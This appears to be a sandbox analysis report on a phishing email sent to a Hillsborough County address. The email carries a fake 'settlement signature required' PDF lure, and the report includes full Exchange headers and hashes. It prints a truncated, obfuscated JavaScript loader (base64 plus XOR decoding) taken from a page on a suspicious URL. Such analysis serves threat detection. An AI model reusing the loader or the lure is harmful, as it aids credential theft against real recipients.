                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (17077), with CRLF line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):22112
                                                                                                                                                                                                                                    Entropy (8bit):5.903897701810823
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:E2E06E5AF3B9B04CA550850AC251A251
                                                                                                                                                                                                                                    SHA1:895333547F489E23BCC4D934902FE2AE105F0E84
                                                                                                                                                                                                                                    SHA-256:B50F69AACB700749272DBC104E70518984B7D98BA5BF18ECCFB7D49332D62C6C
                                                                                                                                                                                                                                    SHA-512:FD2B86776D36AAFC6111E8692437458766C5C5CF14BC9DA432203512E7278B5990645593D6241DC79DDB618CF1F220DEFDC6A2D0D881B0488CF8D0FA18280F51
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/Yx6Is/
                                                                                                                                                                                                                                    Preview:<script>..function AIsHGjCeUM(EqCSLYFMxE, nGKTihGPgF) {..let BqrUmSiPWL = '';..EqCSLYFMxE = atob(EqCSLYFMxE);..let xqiLHsiROe = nGKTihGPgF.length;..for (let i = 0; i < EqCSLYFMxE.length; i++) {.. BqrUmSiPWL += String.fromCharCode(EqCSLYFMxE.charCodeAt(i) ^ nGKTihGPgF.charCodeAt(i % xqiLHsiROe));..}..return BqrUmSiPWL;..}..var JqsQmtzxdu = AIsHGjCeUM(`T0ZSIAgVGHcCGhAIEzoVERwkS0dcVl42BEsGJgQNAUwfMQ4IQz0AHRZHSH9SS1p5QUYeXF98CxZOaU1HAFZDOxERUlp7VABWQzsREUwkAwtOF1kmFRUfbV5HEFFfOBJLDzseHRdTXTMTAEI0HgVcVFszGUoAPhMbXFZDKxERA3obG1wBH2NPVEM0AxEDQV5/CxZCOhgGXV9CcF9ZQyQSGhpFRWxsb2FdTRsQR1giFVthXR8NBBV3Jw8GGD4eBltURT0DTUs2JjEUfnZnCQEBOx8xK2dHMQhQXw0mIhhWXD5TPzQeFg47QlY2UwkZDTZRQHlcHAkHKy8gCTRzRDYmXBgeORBLfHk2EQcBBQcMCgBXMSYNBDUfOgVXYhBZAy8VBDErb0EIUyNcNUIhBlFpHA0GBxEfMiQAAR4MCRkOQxBCb3YEGy4vHTIMK39GGwgOHB45Gz12WBMGLC8WFiEwdFY2UwkZDTZRQHlcKhc8XhFBCSQMRBslVQseHC4aVwIEUSoBHQIxJABDGwsWIhQfWD12XAAXPF8BBTIkAAEeDCMHDTQ+QW9mZ1ExKzsLDDRjRAg5LAMeHBwfUGYAFwFeYxgkMHdcNjZQBjM2BAVXWBMOPzQNHQodZEEbKRYiFBgpFHxy
                                                                                                                                                                                                                                    File type:CDFV2 Microsoft Outlook Message
                                                                                                                                                                                                                                    Entropy (8bit):5.736551736880483
                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                    • Outlook Message (71009/1) 58.92%
                                                                                                                                                                                                                                    • Outlook Form Template (41509/1) 34.44%
                                                                                                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 6.64%
                                                                                                                                                                                                                                    File name:suspectTelling clean needful (78.2 KB).msg
                                                                                                                                                                                                                                    File size:163'840 bytes
                                                                                                                                                                                                                                    MD5:2b0ac19b806490627e0f204ab1c13b4c
                                                                                                                                                                                                                                    SHA1:acb1dcafaaa37c7747da8d9d7ea56ffa59ef6cc1
                                                                                                                                                                                                                                    SHA256:b0b175e8c17ac40bf72ebc62d7a079cc123f9c57a305d7d47bda8393ab287389
                                                                                                                                                                                                                                    SHA512:8dd111dab8f378691f39382024aee69c551700a21a9dacd25ddf1fadbdc1bdcff87578e021b4d13aaa31dbb9cfc17272f310188f0906f336f9ad6cc49736361a
                                                                                                                                                                                                                                    SSDEEP:1536:GUYT9Dvonhh1Pamoz50B1NHT0o3zXZGvm0eJEuPtQEWNJ00tzCGd3SMIyUtean:lY9ont6IXDXZGvmlRGEWZtHdCMHQean
                                                                                                                                                                                                                                    TLSH:EFF384256AEA1119F2F7EB328EE790978936BC626D05DD5F2091370E0671D40E862F3F
                                                                                                                                                                                                                                    File Content Preview:........................>.......................................................B..............................................................................................................................................................................
                                                                                                                                                                                                                                    Subject:Telling clean needful
                                                                                                                                                                                                                                    From:lunafilms@lunafilmspr.com
                                                                                                                                                                                                                                    To:pinedao@hillsboroughcounty.org
                                                                                                                                                                                                                                    Cc:
                                                                                                                                                                                                                                    BCC:
                                                                                                                                                                                                                                    Date:Tue, 25 Mar 2025 06:42:24 +0100
                                                                                                                                                                                                                                    Communications:
                                                                                                                                                                                                                                      Attachments:
                                                                                                                                                                                                                                      • Hillsboroughcounty_Settlement_Review_Signature_Required.pdf
                                                                                                                                                                                                                                      Key Value
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-InternalOrgSenderFalse
                                                                                                                                                                                                                                      Receivedfrom [127.0.0.1] ([193.235.147.162]) by mrelay.perfora.net
                                                                                                                                                                                                                                      by SA1PR09MB11577.namprd09.prod.outlook.com (260310b6:806:36f::7) with
                                                                                                                                                                                                                                      2025 0542:26 +0000
                                                                                                                                                                                                                                      (260310b6:930:1::24) with Microsoft SMTP Server (version=TLS1_3,
                                                                                                                                                                                                                                      25 Mar 2025 0542:25 +0000
                                                                                                                                                                                                                                      Authentication-Resultsspf=pass (sender IP is 74.208.4.197)
                                                                                                                                                                                                                                      Received-SPFPass (protection.outlook.com: domain of lunafilmspr.com
                                                                                                                                                                                                                                      via Frontend Transport; Tue, 25 Mar 2025 0542:25 +0000
                                                                                                                                                                                                                                      DKIM-Signaturev=1; a=rsa-sha256; c=relaxed/relaxed; d=lunafilmspr.com;
                                                                                                                                                                                                                                      h=X-UI-Sender-ClassContent-Type:Content-Transfer-Encoding:From:To:
                                                                                                                                                                                                                                      SubjectMessage-ID:Date:MIME-Version:cc:content-transfer-encoding:
                                                                                                                                                                                                                                      content-typedate:from:message-id:mime-version:reply-to:subject:
                                                                                                                                                                                                                                      X-UI-Sender-Class55c96926-9e95-11ee-ae09-1f7a4046a0f6
                                                                                                                                                                                                                                      for <pinedao@hillsboroughcounty.org>; Tue, 25 Mar 2025 0642:24 +0100
                                                                                                                                                                                                                                      Content-Typeapplication/pdf;
                                                                                                                                                                                                                                      Content-Transfer-Encodingbase64
                                                                                                                                                                                                                                      Content-Dispositionattachment;
                                                                                                                                                                                                                                      Fromlunafilms@lunafilmspr.com
                                                                                                                                                                                                                                      SendereSignature.Pinedao.Hillsboroughcounty.Required.ContractSignatory.SignSecureDocument.To.pinedao@hillsboroughcounty.org
                                                                                                                                                                                                                                      Topinedao@hillsboroughcounty.org
                                                                                                                                                                                                                                      SubjectTelling clean needful
                                                                                                                                                                                                                                      Message-ID<01fe9fd8-d389-364d-25cc-eb02ae21185c@lunafilmspr.com>
                                                                                                                                                                                                                                      DateTue, 25 Mar 2025 05:42:24 +0000
                                                                                                                                                                                                                                      X-Provags-IDV03:K1:2UL6A4g+RRNCjE2cF0RKeguYUopxyF2/6vb/Yt9bJQXetL0MRzX
                                                                                                                                                                                                                                      X-Spam-FlagNO
                                                                                                                                                                                                                                      UI-OutboundReportnotjunk:1;M01:P0:qbPmKvhcSEg=;mvNw08SdOznUwRr1FkMQp1LBHcT
                                                                                                                                                                                                                                      Return-Pathlunafilms@lunafilmspr.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-OriginalArrivalTime25 Mar 2025 05:42:25.3924
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ExpirationStartTime25 Mar 2025 05:42:25.5174
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ExpirationStartTimeReasonOriginalSubmit
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ExpirationInterval1:00:00:00.0000000
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ExpirationIntervalReasonOriginalSubmit
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Network-Message-Ide0db6c12-358c-4410-abcb-08dd6b5fd28f
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-OriginalClientIPAddress74.208.4.197
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-OriginalServerIPAddress10.167.242.198
                                                                                                                                                                                                                                      X-EOPAttributedMessage0
                                                                                                                                                                                                                                      X-EOPTenantAttributedMessage81fe4c9d-9bb8-49bd-90ed-89b8063f4c8a:0
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-TargetResourceForestnamprd09.prod.outlook.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-OrgEopForestGCC02
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-MessageDirectionalityIncoming
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Id81fe4c9d-9bb8-49bd-90ed-89b8063f4c8a
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-FFO-ServiceTagGCC02B
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-TenantServiceProvider1n1
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Cross-Premises-Headers-ProcessedBL02EPF0001B419.namprd09.prod.outlook.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ConnectingIP74.208.4.197
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ConnectingEHLOmout.perfora.net
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-AS-LastExternalIp74.208.4.197
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-IsBipIncludedAtpTenanttrue
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-IsAtpTenanttrue
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Originating-CountryUS
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-OriginalEnvelopeRecipientspinedao@hillsboroughcounty.org
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-TopLevelSpfRecordinclude:_spf.perfora.net
                                                                                                                                                                                                                                      include_spf-us.ionos.com include:_spf.kundenserver.de ~all
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-PassLevelSpfRecordip4:74.208.4.192/26
                                                                                                                                                                                                                                      ip482.165.159.128/27 -all
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-PtrDomainsmout.perfora.net
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-EhloAndPtrDomainmout.perfora.net;mout.perfora.net
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-MxPointsToUstrue
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-RecipientDomainMxRecord-PFAFDhillsboroughcounty.org#hillsboroughcounty-org.mail.protection.outlook.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-RecipientDomainMxInfohcfl.gov#Office365#hcfl-gov.mail.protection.outlook.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-CompAuthRespass
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-CompAuthReason109
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SpoofDetection-Frontdoor-DisplayDomainNamelunafilmspr.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SenderRep-Score5
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SenderRep-DataIpClassLargeGrayOther_GrayOther_unknown
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-VBR-ClassGrayOther
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-HMATPModel-Spf1
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-HMATPModel-Recipient<PII:H100055(3Xt1TUjNmdEZbz2llJxtzsPrgFWYLT2ymCgZ79mAi7M=)>@hillsboroughcounty.org
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-TransportTrafficTypeEmail
                                                                                                                                                                                                                                      X-MS-PublicTrafficTypeEmail
                                                                                                                                                                                                                                      X-MS-TrafficTypeDiagnosticBL02EPF0001B419:EE_|SA1PR09MB11577:EE_
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-OrderedPrecisionLatencyInProgressLSRV=CY5PR09CA0016.namprd09.prod.outlook.com:TOTAL-FE=0.193|SMR-PEN=0.193(RENV=0.145|REOH=0.047);2025-03-25T05:42:25.947Z
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-MessageLatencySRV=CY5PR09CA0016.namprd09.prod.outlook.com:TOTAL-FE=0.253|SMR-PEN=0.193(RENV=0.145|REOH=0.047)|SMS=0.060(SMSC=0.046)
                                                                                                                                                                                                                                      X-MS-Exchange-Forest-ArrivalHubServerSA1PR09MB11577.namprd09.prod.outlook.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-AuthSourceBL02EPF0001B419.namprd09.prod.outlook.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-AuthAsAnonymous
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-FromEntityHeaderInternet
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-MessageScope7389230d-7a97-43be-98db-9371dee32d64
                                                                                                                                                                                                                                      X-MS-Exchange-Forest-MessageScope7389230d-7a97-43be-98db-9371dee32d64
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Antispam-ProtocolFilterHub-ScanContextProtocolFilterHub:SmtpOnEndOfData;
                                                                                                                                                                                                                                      X-MS-Office365-Filtering-Correlation-Ide0db6c12-358c-4410-abcb-08dd6b5fd28f
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-P2SenderPII<PII:H100055(/J12TZ3u39yynG935wT04YG6+N3IuKEAoBnMDxyYFRs=)>@lunafilmspr.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Auth-DmarcStatusPass
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-VerifiedDkimDomainsListlunafilmspr.com
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Antispam-AuthResults{"SpfDomain":"lunafilmspr.com","SpfAuthStatus":"Pass","DkimDomain":"lunafilmspr.com","DkimAuthStatus":"Pass","DkimSubStatus":"None","DmarcAuthStatus":"BestGuessPass","DmarcAction":"None","ArcAuthStatus":"0","ArcSubStatus":"0"}
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-PFAHub-Total-Message-Size95848
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-OriginalSize95848
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-HygienePolicyPremium
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ReplicationInfoReplicaId=b3e4cffd-dbd3-e5b4-d45d-dad25f6bdd08;ReplicatingServerFqdn=PH0PR09MB11581.namprd09.prod.outlook.com
                                                                                                                                                                                                                                      X-MS-Exchange-Forest-Languageen
                                                                                                                                                                                                                                      X-MS-Exchange-Forest-IndexAgent-0AQ0CZW4BH5cCW3sNCiAgImluZGV4IjogMCwNCiAgIkF0dGFjaG1lbn
                                                                                                                                                                                                                                      X-MS-Exchange-Forest-IndexAgent1 867
                                                                                                                                                                                                                                      X-MS-Exchange-Forest-EmailMessageHash00000000,B2699344
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Antispam-PreContentFilter-PolicyLoadTimePSOSUB:35;PSOSUBLOAD:34;PSOSUBRUN:0;PSOSUBCOUNT:0;SMORES:77;SMORESLOAD:75;SMORESRUN:0;SMORESCOUNT:1;SAORES:152;SAORESLOAD:36;SAORESRUN:0;SAORESCOUNT:1;SLORES:39;APORES:37;APORESLOAD:36;RSORES:37;SLORESLOAD:37;SLORESRUN:0;SLORESCOUNT:1;
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-MessageFingerprintX-MS-Exchange-Organization-AttachmentDetailsInfo-ChunkCount: 1
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-AttachmentDetailsInfo-0[{"ID":0,"FS":61396,"SHA256":"5290d5677f2c5e65b56197f47e855ab58b6ebf7ba17645b6f8ca53ba60e7586d","HFH":"UpDVZ38sXmW1YZf0foVatYtuv3uhdkW2+MpTumDnWG0=","FE":"pdf","AF":512,"AFT":"{784:\"Hillsboroughcounty_Settlement_Review_Signature_Required.pdf\",789:\"pdf\"}","AFT2":"{784:\"Hillsboroughcounty_Settlement_Review_Signature_Required.pdf\",789:\"pdf\",2934:\"pdf\",2943:\"PDF\",2945:\"HvjO/h56jVe2SZjsd4FAdA==\"}"}]
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-FeatureTable{1010:0,1028:9131,1029:9071,1030:2496,1031:59,1032:9131,1033:9071,1034:2496,1035:59}
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Antispam-PreContentFilter-ScanContextCategorizerOnSubmitted;CategorizerOnResolved;
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-AVScannedByV2true
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-AVScanCompletetrue
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-IsAnyAttachmentAtpSupportedtrue
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-EmailFingerprintsDetailsInfo-ChunkCount1
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-EmailFingerprintsDetailsInfo-0=?us-ascii?Q?[{"Type":"VA21","Val":"VA21=5FA510FE2CFF8AACF7463485D9790FEA?=
                                                                                                                                                                                                                                      =?us-ascii?Q?2AC7E772EB262BD76B8FDDBE97F8D725CD","Func""SHA256","FF":0,"?=
                                                                                                                                                                                                                                      =?us-ascii?Q?PD"{}},{"Type":"VA20","Val":"VA20=5FA510FE2CFF8AACF7463485D?=
                                                                                                                                                                                                                                      =?us-ascii?Q?9790FEA2AC7E772EB262BD76B8FDDBE97F8D725CD","Func""SHA256","?=
                                                                                                                                                                                                                                      =?us-ascii?Q?FF"0,"PD":{}},{"Type":"VA12","Val":"VA12=5F6FAF76BFD1E0A388?=
                                                                                                                                                                                                                                      =?us-ascii?Q?2BE5AF1CABAA55C790C74A2E4CF8CAF5640F2524E2657787","Func""SH?=
                                                                                                                                                                                                                                      =?us-ascii?Q?A256","FF"0,"PD":{}},{"Type":"VA11","Val":"VA11=5FB59639E54?=
                                                                                                                                                                                                                                      =?us-ascii?Q?nc""SHA256","FF":0,"PD":{}},{"Type":"VA10","Val":"VA10=5F6F?=
                                                                                                                                                                                                                                      =?us-ascii?Q?87","Func""SHA256","FF":0,"PD":{}},{"Type":"VA6","Val":"VA6?=
                                                                                                                                                                                                                                      =?us-ascii?Q?D283D7F","Func""SHA256","FF":0,"PD":{}},{"Type":"VA99","Val?=
                                                                                                                                                                                                                                      =?us-ascii?Q?""VA99=5F511EFD643B166D5A4657994830584984E7ECD8761A0A6E97DD?=
                                                                                                                                                                                                                                      =?us-ascii?Q?DA36FD87E83C22","Func""SHA256","FF":0,"PD":{}},{"Type":"VA5?=
                                                                                                                                                                                                                                      =?us-ascii?Q?","Val""VA5=5F2089617C761AA50381C9B60CD7C2F92BF8C90EEFB41F0?=
                                                                                                                                                                                                                                      =?us-ascii?Q?0712C4EC6C5F27FF189","Func""SHA256","FF":0,"PD":{}},{"Type"?=
                                                                                                                                                                                                                                      =?us-ascii?Q?{}}]?=
                                                                                                                                                                                                                                      =?us-ascii?Q?ECEA5FCFF3A9A1F4399331AC","Func""SHA256","FF":0,"PD":{}},{"?=
                                                                                                                                                                                                                                      =?us-ascii?Q?Type""VA61","Val":"VA61=5F7056D7F7B21FD4B4735533D1D60CA6212?=
                                                                                                                                                                                                                                      =?us-ascii?Q?A595EF6064213CCEEC832FAD7BEDE1C","Func""SHA256","FF":0,"PD"?=
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-OffboxClassificationInfo{"EndpointId":"DCS","OperationIds":{},"OperationStates":{},"Classifiers":[],"RuleInfos":[],"CorrelationId":"c2973af7-8ce2-4ef3-a007-993189e60e36","TotalClassificationLatency":"00:00:00"}
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ExternalRoutingTopologyAnalysisX-MS-Exchange-Organization-Recipient-Limit-Verified: True
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-TotalRecipientCount1
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ExternalRecipientCount0
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-IsSingleRepresentativeTrue
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-ASDirectionalityType1
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-HVERecipientsForked1.0
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SecOpsOverride-Rules-Execution-History71b563d3-0f96-4efe-8cf8-60b9c56a4609
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SafeLinksPolicy-BIPBuilt-In Protection Policy
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SafeAttachmentPolicy-BIPBuilt-In Protection
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SafeAttachmentPolicyBuilt-In Protection Policy
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SafeLinksPolicyBuilt-In Protection Policy
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SafeAttachmentPolicy-Enable1
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SafeLinksPolicy-EnableSafeLinksForEmail1
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SafeLinksPolicy-EnableSafeLinksForInternalSenders0
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SenderRecipientCommunicationStateFC
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Boomerang-VerdictNone
                                                                                                                                                                                                                                      X-MS-Exchange-AtpMessagePropertiesSA|SL
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-CommunicationStateSummaryFC
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-FirstContactSummaryST=3;MRG=0;EXT=0;UN=1;ORCT=1;EV=1;FC=1;NESI=0;NES=0;ESTI=0;EST=0;INS=0;MP=0;UD=0;QE=0;ERR=0
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-SenderIntelligence-P2SenderOrgDomainTenantId{"stringProperties":{"_STATUS":"Success"},"numericProperties":{"EntityFound":1}}
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-FeatureTableV2{384:"lunafilmspr.com",385:"lunafilmspr.com",386:"True",387:"True",452:1,453:1,454:"F11260F9@hcfl.gov",455:"FC",501:1,502:1,503:2,504:1,506:2,507:1,508:"lunafilmspr.com",509:"lunafilmspr.com",510:"lunafilmspr.com",651:2,653:1,656:1,739:1,743:1,749:"Latn",756:0,757:0,1010:0,1028:9131,1029:9071,1030:2496,1031:59,1032:9131,1033:9071,1034:2496,1035:59,1036:"8560",2501:0,2502:0,2503:0,2504:0,2505:0,2506:0,2507:0,2508:0,2509:0,2510:0,2511:0,2512:0,2513:0,2514:0,2515:0,2516:0,2517:0,2518:0,2519:0,2520:0,2521:0,2522:0,2523:0,2524:0,2525:0,2526:0,2527:0,2528:0,2529:0,2530:0,2531:0,2532:0,2533:0,2534:0,2535:0,2536:0,2537:0,2538:0,2539:0,2684:448,2685:442,2686:448,2687:442,2747:4,2760:1,2924:"CorrectlyConfigured",3084:"0",3099:1,3100:59,3149:0,3155:2534,3156:2534}
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Antispam-AnalystFeatureFilter-ScanContextCategorizerOnResolved;
                                                                                                                                                                                                                                      X-MS-Exchange-Organization-Cross-Session-Cache=?us-ascii?Q?01IAA3ADQALgAyADAAOAAuADQALgAxADkANwA=3D,cwBtAHQAcAAuAHIAYwB?=
                                                                                                                                                                                                                                      =?us-ascii?Q?2013-10-31_1551:46.000;TMD=5FEDUA=3D0;TMD=5FS500=3D0;TMD=5F?=
                                                                                                                                                                                                                                      =?us-ascii?Q?5f752-5018-4b29-b072-4ccc94499389;SLPC=3DF101111;SAP=3D2e8b?=
                                                                                                                                                                                                                                      =?us-ascii?Q?3b92-3c1e-4ae6-8d2a-2835935ec04d;SAPC=3DF1|A:0;BIPLT=3D3;DI?=
                                                                                                                                                                                                                                      MIME-Version1.0
                                                                                                                                                                                                                                      dateTue, 25 Mar 2025 06:42:24 +0100

                                                                                                                                                                                                                                      Icon Hash:c4e1928eacb280a2